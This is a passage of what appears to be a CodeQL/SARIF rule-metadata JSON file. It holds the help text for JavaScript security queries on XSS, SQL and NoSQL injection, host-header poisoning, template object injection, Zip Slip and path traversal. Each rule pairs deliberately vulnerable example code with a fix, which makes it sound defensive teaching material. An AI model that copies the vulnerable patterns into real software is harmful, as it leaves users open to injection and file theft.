are mentioned in the references.\n\n\n## Example\nThe following example shows part of the page URL being written directly to the document, leaving the website vulnerable to cross-site scripting.\n\n\n```javascript\nfunction setLanguageOptions() {\n    var href = document.location.href,\n        deflt = href.substring(href.indexOf(\"default=\")+8);\n    document.write(\"<OPTION value=1>\"+deflt+\"</OPTION>\");\n    document.write(\"<OPTION value=2>English</OPTION>\");\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n"},"properties":{"tags":["security","external/cwe/cwe-079","external/cwe/cwe-116"],"description":"Writing user input directly to the DOM allows for\n              a cross-site scripting vulnerability.","id":"js/xss","kind":"path-problem","name":"Client-side cross-site scripting","precision":"high","problem.severity":"error","security-severity":"7.8"}},{"id":"js/sql-injection","name":"js/sql-injection","shortDescription":{"text":"Database query built from user-controlled sources"},"fullDescription":{"text":"Building a database query from user-controlled sources is vulnerable to insertion of malicious code by the user."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Database query built from user-controlled sources\nIf a database query (such as a SQL or NoSQL query) is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries.\n\n\n## Recommendation\nMost database connector libraries offer a way of safely embedding untrusted data into a query by means of query parameters or prepared statements.\n\nFor NoSQL queries, make use of an operator like MongoDB's `$eq` to ensure that untrusted data is interpreted as a literal value and not as a query object. Alternatively, check that the untrusted data is a literal value and not a query object before using it in a query.\n\nFor SQL queries, use query parameters or prepared statements to embed untrusted data into the query string, or use a library like `sqlstring` to escape untrusted data.\n\n\n## Example\nIn the following example, assume the function `handler` is an HTTP request handler in a web application, whose parameter `req` contains the request object.\n\nThe handler constructs an SQL query string from user input and executes it as a database query using the `pg` library. The user input may contain quote characters, so this code is vulnerable to a SQL injection attack.\n\n\n```javascript\nconst app = require(\"express\")(),\n      pg = require(\"pg\"),\n      pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n  // BAD: the category might have SQL special characters in it\n  var query1 =\n    \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='\" +\n    req.params.category +\n    \"' ORDER BY PRICE\";\n  pool.query(query1, [], function(err, results) {\n    // process results\n  });\n});\n\n```\nTo fix this vulnerability, we can use query parameters to embed the user input into the query string. In this example, we use the API offered by the `pg` Postgres database connector library, but other libraries offer similar features. This version is immune to injection attacks.\n\n\n```javascript\nconst app = require(\"express\")(),\n      pg = require(\"pg\"),\n      pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n  // GOOD: use parameters\n  var query2 =\n    \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE\";\n  pool.query(query2, [req.params.category], function(err, results) {\n    // process results\n  });\n});\n\n```\nAlternatively, we can use a library like `sqlstring` to escape the user input before embedding it into the query string:\n\n\n```javascript\nconst app = require(\"express\")(),\n      pg = require(\"pg\"),\n      SqlString = require('sqlstring'),\n      pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n  // GOOD: the category is escaped using mysql.escape\n  var query1 =\n    \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='\" +\n    SqlString.escape(req.params.category) +\n    \"' ORDER BY PRICE\";\n  pool.query(query1, [], function(err, results) {\n    // process results\n  });\n});\n\n```\n\n## Example\nIn the following example, an express handler attempts to delete a single document from a MongoDB collection. The document to be deleted is identified by its `_id` field, which is constructed from user input. The user input may contain a query object, so this code is vulnerable to a NoSQL injection attack.\n\n\n```javascript\nconst express = require(\"express\");\nconst mongoose = require(\"mongoose\");\nconst Todo = mongoose.model(\n  \"Todo\",\n  new mongoose.Schema({ text: { type: String } }, { timestamps: true })\n);\n\nconst app = express();\napp.use(express.json());\napp.use(express.urlencoded({ extended: false }));\n\napp.delete(\"/api/delete\", async (req, res) => {\n  let id = req.body.id;\n\n  await Todo.deleteOne({ _id: id }); // BAD: id might be an object with special properties\n\n  res.json({ status: \"ok\" });\n});\n\n```\nTo fix this vulnerability, we can use the `$eq` operator to ensure that the user input is interpreted as a literal value and not as a query object:\n\n\n```javascript\napp.delete(\"/api/delete\", async (req, res) => {\n  let id = req.body.id;\n  await Todo.deleteOne({ _id: { $eq: id } }); // GOOD: using $eq operator for the comparison\n\n  res.json({ status: \"ok\" });\n});\n```\nAlternatively check that the user input is a literal value and not a query object before using it:\n\n\n```javascript\napp.delete(\"/api/delete\", async (req, res) => {\n  let id = req.body.id;\n  if (typeof id !== \"string\") {\n    res.status(400).json({ status: \"error\" });\n    return;\n  }\n  await Todo.deleteOne({ _id: id }); // GOOD: id is guaranteed to be a string\n\n  res.json({ status: \"ok\" });\n});\n\n```\n\n## References\n* Wikipedia: [SQL injection](https://en.wikipedia.org/wiki/SQL_injection).\n* MongoDB: [$eq operator](https://docs.mongodb.com/manual/reference/operator/query/eq).\n* OWASP: [NoSQL injection](https://owasp.org/www-pdf-archive/GOD16-NOSQL.pdf).\n* Common Weakness Enumeration: [CWE-89](https://cwe.mitre.org/data/definitions/89.html).\n* Common Weakness Enumeration: [CWE-90](https://cwe.mitre.org/data/definitions/90.html).\n* Common Weakness Enumeration: [CWE-943](https://cwe.mitre.org/data/definitions/943.html).\n","markdown":"# Database query built from user-controlled sources\nIf a database query (such as a SQL or NoSQL query) is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries.\n\n\n## Recommendation\nMost database connector libraries offer a way of safely embedding untrusted data into a query by means of query parameters or prepared statements.\n\nFor NoSQL queries, make use of an operator like MongoDB's `$eq` to ensure that untrusted data is interpreted as a literal value and not as a query object. Alternatively, check that the untrusted data is a literal value and not a query object before using it in a query.\n\nFor SQL queries, use query parameters or prepared statements to embed untrusted data into the query string, or use a library like `sqlstring` to escape untrusted data.\n\n\n## Example\nIn the following example, assume the function `handler` is an HTTP request handler in a web application, whose parameter `req` contains the request object.\n\nThe handler constructs an SQL query string from user input and executes it as a database query using the `pg` library. The user input may contain quote characters, so this code is vulnerable to a SQL injection attack.\n\n\n```javascript\nconst app = require(\"express\")(),\n      pg = require(\"pg\"),\n      pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n  // BAD: the category might have SQL special characters in it\n  var query1 =\n    \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='\" +\n    req.params.category +\n    \"' ORDER BY PRICE\";\n  pool.query(query1, [], function(err, results) {\n    // process results\n  });\n});\n\n```\nTo fix this vulnerability, we can use query parameters to embed the user input into the query string. In this example, we use the API offered by the `pg` Postgres database connector library, but other libraries offer similar features. This version is immune to injection attacks.\n\n\n```javascript\nconst app = require(\"express\")(),\n      pg = require(\"pg\"),\n      pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n  // GOOD: use parameters\n  var query2 =\n    \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE\";\n  pool.query(query2, [req.params.category], function(err, results) {\n    // process results\n  });\n});\n\n```\nAlternatively, we can use a library like `sqlstring` to escape the user input before embedding it into the query string:\n\n\n```javascript\nconst app = require(\"express\")(),\n      pg = require(\"pg\"),\n      SqlString = require('sqlstring'),\n      pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n  // GOOD: the category is escaped using mysql.escape\n  var query1 =\n    \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='\" +\n    SqlString.escape(req.params.category) +\n    \"' ORDER BY PRICE\";\n  pool.query(query1, [], function(err, results) {\n    // process results\n  });\n});\n\n```\n\n## Example\nIn the following example, an express handler attempts to delete a single document from a MongoDB collection. The document to be deleted is identified by its `_id` field, which is constructed from user input. The user input may contain a query object, so this code is vulnerable to a NoSQL injection attack.\n\n\n```javascript\nconst express = require(\"express\");\nconst mongoose = require(\"mongoose\");\nconst Todo = mongoose.model(\n  \"Todo\",\n  new mongoose.Schema({ text: { type: String } }, { timestamps: true })\n);\n\nconst app = express();\napp.use(express.json());\napp.use(express.urlencoded({ extended: false }));\n\napp.delete(\"/api/delete\", async (req, res) => {\n  let id = req.body.id;\n\n  await Todo.deleteOne({ _id: id }); // BAD: id might be an object with special properties\n\n  res.json({ status: \"ok\" });\n});\n\n```\nTo fix this vulnerability, we can use the `$eq` operator to ensure that the user input is interpreted as a literal value and not as a query object:\n\n\n```javascript\napp.delete(\"/api/delete\", async (req, res) => {\n  let id = req.body.id;\n  await Todo.deleteOne({ _id: { $eq: id } }); // GOOD: using $eq operator for the comparison\n\n  res.json({ status: \"ok\" });\n});\n```\nAlternatively check that the user input is a literal value and not a query object before using it:\n\n\n```javascript\napp.delete(\"/api/delete\", async (req, res) => {\n  let id = req.body.id;\n  if (typeof id !== \"string\") {\n    res.status(400).json({ status: \"error\" });\n    return;\n  }\n  await Todo.deleteOne({ _id: id }); // GOOD: id is guaranteed to be a string\n\n  res.json({ status: \"ok\" });\n});\n\n```\n\n## References\n* Wikipedia: [SQL injection](https://en.wikipedia.org/wiki/SQL_injection).\n* MongoDB: [$eq operator](https://docs.mongodb.com/manual/reference/operator/query/eq).\n* OWASP: [NoSQL injection](https://owasp.org/www-pdf-archive/GOD16-NOSQL.pdf).\n* Common Weakness Enumeration: [CWE-89](https://cwe.mitre.org/data/definitions/89.html).\n* Common Weakness Enumeration: [CWE-90](https://cwe.mitre.org/data/definitions/90.html).\n* Common Weakness Enumeration: [CWE-943](https://cwe.mitre.org/data/definitions/943.html).\n"},"properties":{"tags":["security","external/cwe/cwe-089","external/cwe/cwe-090","external/cwe/cwe-943"],"description":"Building a database query from user-controlled sources is vulnerable to insertion of\n              malicious code by the user.","id":"js/sql-injection","kind":"path-problem","name":"Database query built from user-controlled sources","precision":"high","problem.severity":"error","security-severity":"8.8"}},{"id":"js/host-header-forgery-in-email-generation","name":"js/host-header-forgery-in-email-generation","shortDescription":{"text":"Host header poisoning in email generation"},"fullDescription":{"text":"Using the HTTP Host header to construct a link in an email can facilitate phishing attacks and leak password reset tokens."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Host header poisoning in email generation\nUsing the HTTP Host header to construct a link in an email can facilitate phishing attacks and leak password reset tokens. A malicious user can send an HTTP request to the targeted web site, but with a Host header that refers to his own web site. This means the emails will be sent out to potential victims, originating from a server they trust, but with links leading to a malicious web site.\n\nIf the email contains a password reset link, and should the victim click the link, the secret reset token will be leaked to the attacker. Using the leaked token, the attacker can then construct the real reset link and use it to change the victim's password.\n\n\n## Recommendation\nObtain the server's host name from a configuration file and avoid relying on the Host header.\n\n\n## Example\nThe following example uses the `req.host` to generate a password reset link. This value is derived from the Host header, and can thus be set to anything by an attacker:\n\n\n```javascript\nlet nodemailer = require('nodemailer');\nlet express = require('express');\nlet backend = require('./backend');\n\nlet app = express();\n\nlet config = JSON.parse(fs.readFileSync('config.json', 'utf8'));\n\napp.post('/resetpass', (req, res) => {\n  let email = req.query.email;\n  let transport = nodemailer.createTransport(config.smtp);\n  let token = backend.getUserSecretResetToken(email);\n  transport.sendMail({\n    from: 'webmaster@example.com',\n    to: email,\n    subject: 'Forgot password',\n    text: `Click to reset password: https://${req.host}/resettoken/${token}`,\n  });\n});\n\n```\nTo ensure the link refers to the correct web site, get the host name from a configuration file:\n\n\n```javascript\nlet nodemailer = require('nodemailer');\nlet express = require('express');\nlet backend = require('./backend');\n\nlet app = express();\n\nlet config = JSON.parse(fs.readFileSync('config.json', 'utf8'));\n\napp.post('/resetpass', (req, res) => {\n  let email = req.query.email;\n  let transport = nodemailer.createTransport(config.smtp);\n  let token = backend.getUserSecretResetToken(email);\n  transport.sendMail({\n    from: 'webmaster@example.com',\n    to: email,\n    subject: 'Forgot password',\n    text: `Click to reset password: https://${config.hostname}/resettoken/${token}`,\n  });\n});\n\n```\n\n## References\n* Mitre: [CWE-640: Weak Password Recovery Mechanism for Forgotten Password](https://cwe.mitre.org/data/definitions/640.html).\n* Ian Muscat: [What is a Host Header Attack?](https://www.acunetix.com/blog/articles/automated-detection-of-host-header-attacks/).\n* Common Weakness Enumeration: [CWE-640](https://cwe.mitre.org/data/definitions/640.html).\n","markdown":"# Host header poisoning in email generation\nUsing the HTTP Host header to construct a link in an email can facilitate phishing attacks and leak password reset tokens. A malicious user can send an HTTP request to the targeted web site, but with a Host header that refers to his own web site. This means the emails will be sent out to potential victims, originating from a server they trust, but with links leading to a malicious web site.\n\nIf the email contains a password reset link, and should the victim click the link, the secret reset token will be leaked to the attacker. Using the leaked token, the attacker can then construct the real reset link and use it to change the victim's password.\n\n\n## Recommendation\nObtain the server's host name from a configuration file and avoid relying on the Host header.\n\n\n## Example\nThe following example uses the `req.host` to generate a password reset link. This value is derived from the Host header, and can thus be set to anything by an attacker:\n\n\n```javascript\nlet nodemailer = require('nodemailer');\nlet express = require('express');\nlet backend = require('./backend');\n\nlet app = express();\n\nlet config = JSON.parse(fs.readFileSync('config.json', 'utf8'));\n\napp.post('/resetpass', (req, res) => {\n  let email = req.query.email;\n  let transport = nodemailer.createTransport(config.smtp);\n  let token = backend.getUserSecretResetToken(email);\n  transport.sendMail({\n    from: 'webmaster@example.com',\n    to: email,\n    subject: 'Forgot password',\n    text: `Click to reset password: https://${req.host}/resettoken/${token}`,\n  });\n});\n\n```\nTo ensure the link refers to the correct web site, get the host name from a configuration file:\n\n\n```javascript\nlet nodemailer = require('nodemailer');\nlet express = require('express');\nlet backend = require('./backend');\n\nlet app = express();\n\nlet config = JSON.parse(fs.readFileSync('config.json', 'utf8'));\n\napp.post('/resetpass', (req, res) => {\n  let email = req.query.email;\n  let transport = nodemailer.createTransport(config.smtp);\n  let token = backend.getUserSecretResetToken(email);\n  transport.sendMail({\n    from: 'webmaster@example.com',\n    to: email,\n    subject: 'Forgot password',\n    text: `Click to reset password: https://${config.hostname}/resettoken/${token}`,\n  });\n});\n\n```\n\n## References\n* Mitre: [CWE-640: Weak Password Recovery Mechanism for Forgotten Password](https://cwe.mitre.org/data/definitions/640.html).\n* Ian Muscat: [What is a Host Header Attack?](https://www.acunetix.com/blog/articles/automated-detection-of-host-header-attacks/).\n* Common Weakness Enumeration: [CWE-640](https://cwe.mitre.org/data/definitions/640.html).\n"},"properties":{"tags":["security","external/cwe/cwe-640"],"description":"Using the HTTP Host header to construct a link in an email can facilitate phishing\n              attacks and leak password reset tokens.","id":"js/host-header-forgery-in-email-generation","kind":"path-problem","name":"Host header poisoning in email generation","precision":"high","problem.severity":"error","security-severity":"9.8"}},{"id":"js/template-object-injection","name":"js/template-object-injection","shortDescription":{"text":"Template Object Injection"},"fullDescription":{"text":"Instantiating a template using a user-controlled object is vulnerable to local file read and potential remote code execution."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Template Object Injection\nDirectly using user-controlled objects as arguments to template engines might allow an attacker to do local file reads or even remote code execution.\n\n\n## Recommendation\nAvoid using user-controlled objects as arguments to a template engine. Instead, construct the object explicitly with the specific properties needed by the template.\n\n\n## Example\nIn the example below a server uses the user-controlled `profile` object to render the `index` template.\n\n\n```javascript\nvar app = require('express')();\napp.set('view engine', 'hbs');\n\napp.post('/', function (req, res, next) {\n    var profile = req.body.profile;\n    res.render('index', profile);\n});\n```\nHowever, if an attacker adds a `layout` property to the `profile` object then the server will load the file specified by the `layout` property, thereby allowing an attacker to do local file reads.\n\nThe fix is to have the server construct the object, and only add the properties that are needed by the template.\n\n\n```javascript\nvar app = require('express')();\napp.set('view engine', 'hbs');\n\napp.post('/', function (req, res, next) {\n    var profile = req.body.profile;\n    res.render('index', {\n        name: profile.name,\n        location: profile.location\n    });\n});\n```\n\n## References\n* blog.shoebpatel.com: [The Secret Parameter, LFR, and Potential RCE in NodeJS Apps](https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/).\n* cwe.mitre.org: [CWE-73: External Control of File Name or Path](https://cwe.mitre.org/data/definitions/73.html)\n* Common Weakness Enumeration: [CWE-73](https://cwe.mitre.org/data/definitions/73.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n","markdown":"# Template Object Injection\nDirectly using user-controlled objects as arguments to template engines might allow an attacker to do local file reads or even remote code execution.\n\n\n## Recommendation\nAvoid using user-controlled objects as arguments to a template engine. Instead, construct the object explicitly with the specific properties needed by the template.\n\n\n## Example\nIn the example below a server uses the user-controlled `profile` object to render the `index` template.\n\n\n```javascript\nvar app = require('express')();\napp.set('view engine', 'hbs');\n\napp.post('/', function (req, res, next) {\n    var profile = req.body.profile;\n    res.render('index', profile);\n});\n```\nHowever, if an attacker adds a `layout` property to the `profile` object then the server will load the file specified by the `layout` property, thereby allowing an attacker to do local file reads.\n\nThe fix is to have the server construct the object, and only add the properties that are needed by the template.\n\n\n```javascript\nvar app = require('express')();\napp.set('view engine', 'hbs');\n\napp.post('/', function (req, res, next) {\n    var profile = req.body.profile;\n    res.render('index', {\n        name: profile.name,\n        location: profile.location\n    });\n});\n```\n\n## References\n* blog.shoebpatel.com: [The Secret Parameter, LFR, and Potential RCE in NodeJS Apps](https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/).\n* cwe.mitre.org: [CWE-73: External Control of File Name or Path](https://cwe.mitre.org/data/definitions/73.html)\n* Common Weakness Enumeration: [CWE-73](https://cwe.mitre.org/data/definitions/73.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n"},"properties":{"tags":["security","external/cwe/cwe-073","external/cwe/cwe-094"],"description":"Instantiating a template using a user-controlled object is vulnerable to local file read and potential remote code execution.","id":"js/template-object-injection","kind":"path-problem","name":"Template Object Injection","precision":"high","problem.severity":"error","security-severity":"9.3"}},{"id":"js/zipslip","name":"js/zipslip","shortDescription":{"text":"Arbitrary file access during archive extraction (\"Zip Slip\")"},"fullDescription":{"text":"Extracting files from a malicious ZIP file, or similar type of archive, without validating that the destination file path is within the destination directory can allow an attacker to unexpectedly gain access to resources."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Arbitrary file access during archive extraction (\"Zip Slip\")\nExtracting files from a malicious zip file, or similar type of archive, is at risk of directory traversal attacks if filenames from the archive are not properly validated. archive paths.\n\nZip archives contain archive entries representing each file in the archive. These entries include a file path for the entry, but these file paths are not restricted and may contain unexpected special elements such as the directory traversal element (`..`). If these file paths are used to create a filesystem path, then a file operation may happen in an unexpected location. This can result in sensitive information being revealed or deleted, or an attacker being able to influence behavior by modifying unexpected files.\n\nFor example, if a zip file contains a file entry `..\\sneaky-file`, and the zip file is extracted to the directory `c:\\output`, then naively combining the paths would result in an output file path of `c:\\output\\..\\sneaky-file`, which would cause the file to be written to `c:\\sneaky-file`.\n\n\n## Recommendation\nEnsure that output paths constructed from zip archive entries are validated to prevent writing files to unexpected locations.\n\nThe recommended way of writing an output file from a zip archive entry is to check that `\"..\"` does not occur in the path.\n\n\n## Example\nIn this example an archive is extracted without validating file paths. If `archive.zip` contained relative paths (for instance, if it were created by something like `zip archive.zip ../file.txt`) then executing this code could write to locations outside the destination directory.\n\n\n```javascript\nconst fs = require('fs');\nconst unzip = require('unzip');\n\nfs.createReadStream('archive.zip')\n  .pipe(unzip.Parse())\n  .on('entry', entry => {\n    const fileName = entry.path;\n    // BAD: This could write any file on the filesystem.\n    entry.pipe(fs.createWriteStream(fileName));\n  });\n\n```\nTo fix this vulnerability, we need to check that the path does not contain any `\"..\"` elements in it.\n\n\n```javascript\nconst fs = require('fs');\nconst unzip = require('unzip');\n\nfs.createReadStream('archive.zip')\n  .pipe(unzip.Parse())\n  .on('entry', entry => {\n    const fileName = entry.path;\n    // GOOD: ensures the path is safe to write to.\n    if (fileName.indexOf('..') == -1) {\n      entry.pipe(fs.createWriteStream(fileName));\n    }\n    else {\n      console.log('skipping bad path', fileName);\n    }\n  });\n\n```\n\n## References\n* Snyk: [Zip Slip Vulnerability](https://snyk.io/research/zip-slip-vulnerability).\n* OWASP: [Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* Common Weakness Enumeration: [CWE-22](https://cwe.mitre.org/data/definitions/22.html).\n","markdown":"# Arbitrary file access during archive extraction (\"Zip Slip\")\nExtracting files from a malicious zip file, or similar type of archive, is at risk of directory traversal attacks if filenames from the archive are not properly validated. archive paths.\n\nZip archives contain archive entries representing each file in the archive. These entries include a file path for the entry, but these file paths are not restricted and may contain unexpected special elements such as the directory traversal element (`..`). If these file paths are used to create a filesystem path, then a file operation may happen in an unexpected location. This can result in sensitive information being revealed or deleted, or an attacker being able to influence behavior by modifying unexpected files.\n\nFor example, if a zip file contains a file entry `..\\sneaky-file`, and the zip file is extracted to the directory `c:\\output`, then naively combining the paths would result in an output file path of `c:\\output\\..\\sneaky-file`, which would cause the file to be written to `c:\\sneaky-file`.\n\n\n## Recommendation\nEnsure that output paths constructed from zip archive entries are validated to prevent writing files to unexpected locations.\n\nThe recommended way of writing an output file from a zip archive entry is to check that `\"..\"` does not occur in the path.\n\n\n## Example\nIn this example an archive is extracted without validating file paths. If `archive.zip` contained relative paths (for instance, if it were created by something like `zip archive.zip ../file.txt`) then executing this code could write to locations outside the destination directory.\n\n\n```javascript\nconst fs = require('fs');\nconst unzip = require('unzip');\n\nfs.createReadStream('archive.zip')\n  .pipe(unzip.Parse())\n  .on('entry', entry => {\n    const fileName = entry.path;\n    // BAD: This could write any file on the filesystem.\n    entry.pipe(fs.createWriteStream(fileName));\n  });\n\n```\nTo fix this vulnerability, we need to check that the path does not contain any `\"..\"` elements in it.\n\n\n```javascript\nconst fs = require('fs');\nconst unzip = require('unzip');\n\nfs.createReadStream('archive.zip')\n  .pipe(unzip.Parse())\n  .on('entry', entry => {\n    const fileName = entry.path;\n    // GOOD: ensures the path is safe to write to.\n    if (fileName.indexOf('..') == -1) {\n      entry.pipe(fs.createWriteStream(fileName));\n    }\n    else {\n      console.log('skipping bad path', fileName);\n    }\n  });\n\n```\n\n## References\n* Snyk: [Zip Slip Vulnerability](https://snyk.io/research/zip-slip-vulnerability).\n* OWASP: [Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* Common Weakness Enumeration: [CWE-22](https://cwe.mitre.org/data/definitions/22.html).\n"},"properties":{"tags":["security","external/cwe/cwe-022"],"description":"Extracting files from a malicious ZIP file, or similar type of archive, without\n              validating that the destination file path is within the destination directory\n              can allow an attacker to unexpectedly gain access to resources.","id":"js/zipslip","kind":"path-problem","name":"Arbitrary file access during archive extraction (\"Zip Slip\")","precision":"high","problem.severity":"error","security-severity":"7.5"}},{"id":"js/path-injection","name":"js/path-injection","shortDescription":{"text":"Uncontrolled data used in path expression"},"fullDescription":{"text":"Accessing paths influenced by users can allow an attacker to access unexpected resources."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Uncontrolled data used in path expression\nAccessing files using paths constructed from user-controlled data can allow an attacker to access unexpected resources. This can result in sensitive information being revealed or deleted, or an attacker being able to influence behavior by modifying unexpected files.\n\n\n## Recommendation\nValidate user input before using it to construct a file path.\n\nThe validation method you should use depends on whether you want to allow the user to specify complex paths with multiple components that may span multiple folders, or only simple filenames without a path component.\n\nIn the former case, a common strategy is to make sure that the constructed file path is contained within a safe root folder. First, normalize the path using `path.resolve` or `fs.realpathSync` to remove any \"..\" segments. You should always normalize the file path since an unnormalized path that starts with the root folder can still be used to access files outside the root folder. Then, after you have normalized the path, check that the path starts with the root folder.\n\nIn the latter case, you can use a library like the `sanitize-filename` npm package to eliminate any special characters from the file path. Note that it is *not* sufficient to only remove \"../\" sequences: for example, applying this filter to \".../...//\" would still result in the string \"../\".\n\nFinally, the simplest (but most restrictive) option is to use an allow list of safe patterns and make sure that the user input matches one of these patterns.\n\n\n## Example\nIn the first (bad) example, the code reads the file name from an HTTP request, then accesses that file within a root folder. A malicious user could enter a file name containing \"../\" segments to navigate outside the root folder and access sensitive files.\n\n\n```javascript\nconst fs = require('fs'),\n      http = require('http'),\n      url = require('url');\n\nconst ROOT = \"/var/www/\";\n\nvar server = http.createServer(function(req, res) {\n  let filePath = url.parse(req.url, true).query.path;\n\n  // BAD: This function uses unsanitized input that can read any file on the file system.\n  res.write(fs.readFileSync(ROOT + filePath, 'utf8'));\n});\n```\nThe second (good) example shows how to avoid access to sensitive files by sanitizing the file path. First, the code resolves the file name relative to a root folder, normalizing the path and removing any \"../\" segments in the process. Then, the code calls `fs.realpathSync` to resolve any symbolic links in the path. Finally, the code checks that the normalized path starts with the path of the root folder, ensuring the file is contained within the root folder.\n\n\n```javascript\nconst fs = require('fs'),\n      http = require('http'),\n      path = require('path'),\n      url = require('url');\n\nconst ROOT = \"/var/www/\";\n\nvar server = http.createServer(function(req, res) {\n  let filePath = url.parse(req.url, true).query.path;\n\n  // GOOD: Verify that the file path is under the root directory\n  filePath = fs.realpathSync(path.resolve(ROOT, filePath));\n  if (!filePath.startsWith(ROOT)) {\n    res.statusCode = 403;\n    res.end();\n    return;\n  }\n  res.write(fs.readFileSync(filePath, 'utf8'));\n});\n```\n\n## References\n* OWASP: [Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* npm: [sanitize-filename](https://www.npmjs.com/package/sanitize-filename) package.\n* Common Weakness Enumeration: [CWE-22](https://cwe.mitre.org/data/definitions/22.html).\n* Common Weakness Enumeration: [CWE-23](https://cwe.mitre.org/data/definitions/23.html).\n* Common Weakness Enumeration: [CWE-36](https://cwe.mitre.org/data/definitions/36.html).\n* Common Weakness Enumeration: [CWE-73](https://cwe.mitre.org/data/definitions/73.html).\n* Common Weakness Enumeration: [CWE-99](https://cwe.mitre.org/data/definitions/99.html).\n","markdown":"# Uncontrolled data used in path expression\nAccessing files using paths constructed from user-controlled data can allow an attacker to access unexpected resources. This can result in sensitive information being revealed or deleted, or an attacker being able to influence behavior by modifying unexpected files.\n\n\n## Recommendation\nValidate user input before using it to construct a file path.\n\nThe validation method you should use depends on whether you want to allow the user to specify complex paths with multiple components that may span multiple folders, or only simple filenames without a path component.\n\nIn the former case, a common strategy is to make sure that the constructed file path is contained within a safe root folder. First, normalize the path using `path.resolve` or `fs.realpathSync` to remove any \"..\" segments. You should always normalize the file path since an unnormalized path that starts with the root folder can still be used to access files outside the root folder. Then, after you have normalized the path, check that the path starts with the root folder.\n\nIn the latter case, you can use a library like the `sanitize-filename` npm package to eliminate any special characters from the file path. Note that it is *not* sufficient to only remove \"../\" sequences: for example, applying this filter to \".../...//\" would still result in the string \"../\".\n\nFinally, the simplest (but most restrictive) option is to use an allow list of safe patterns and make sure that the user input matches one of these patterns.\n\n\n## Example\nIn the first (bad) example, the code reads the file name from an HTTP request, then accesses that file within a root folder. A malicious user could enter a file name containing \"../\" segments to navigate outside the root folder and access sensitive files.\n\n\n```javascript\nconst fs = require('fs'),\n      http = require('http'),\n      url = require('url');\n\nconst ROOT = \"/var/www/\";\n\nvar server = http.createServer(function(req, res) {\n  let filePath = url.parse(req.url, true).query.path;\n\n  // BAD: This function uses unsanitized input that can read any file on the file system.\n  res.write(fs.readFileSync(ROOT + filePath, 'utf8'));\n});\n```\nThe second (good) example shows how to avoid access to sensitive files by sanitizing the file path. First, the code resolves the file name relative to a root folder, normalizing the path and removing any \"../\" segments in the process. Then, the code calls `fs.realpathSync` to resolve any symbolic links in the path. Finally, the code checks that the normalized path starts with the path of the root folder, ensuring the file is contained within the root folder.\n\n\n```javascript\nconst fs = require('fs'),\n      http = require('http'),\n      path = require('path'),\n      url = require('url');\n\nconst ROOT = \"/var/www/\";\n\nvar server = http.createServer(function(req, res) {\n  let filePath = url.parse(req.url, true).query.path;\n\n  // GOOD: Verify that the file path is under the root directory\n  filePath = fs.realpathSync(path.resolve(ROOT, filePath));\n  if (!filePath.startsWith(ROOT)) {\n    res.statusCode = 403;\n    res.end();\n    return;\n  }\n  res.write(fs.readFileSync(filePath, 'utf8'));\n});\n```\n\n## References\n* OWASP: [Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* npm: [sanitize-filename](https://www.npmjs.com/package/sanitize-filename) package.\n* Common Weakness Enumeration: [CWE-22](https://cwe.mitre.org/data/definitions/22.html).\n* Common Weakness Enumeration: [CWE-23](https://cwe.mitre.org/data/definitions/23.html).\n* Common Weakness Enumeration: [CWE-36](https://cwe.mitre.org/data/definitions/36.html).\n* Common Weakness Enumeration: [CWE-73](https://cwe.mitre.org/data/definitions/73.html).\n* Common Weakness Enumeration: [CWE-99](https://cwe.mitre.org/data/definitions/99.html).\n"},"properties":{"tags":["security","external/cwe/cwe-022","external/cwe/cwe-023","external/cwe/cwe-036","external/cwe/cwe-073","external/cwe/cwe-099"],"description":"Accessing paths influenced by users can allow an attacker to access\n              unexpected resources.","id":"js/path-injection","kind":"path-problem","name":"Uncontrolled data used in path expression","precision":"high","problem.severity":"error","security-severity":"7.5"}},{"id":"js/clear-text-cookie","name":"js/clear-text-cookie","shortDescription":{"text":"Clear text transmission of sensitive cookie"},"fullDescription":{"text":"Sending sensitive information in a cookie without requring SSL encryption can expose the cookie to an 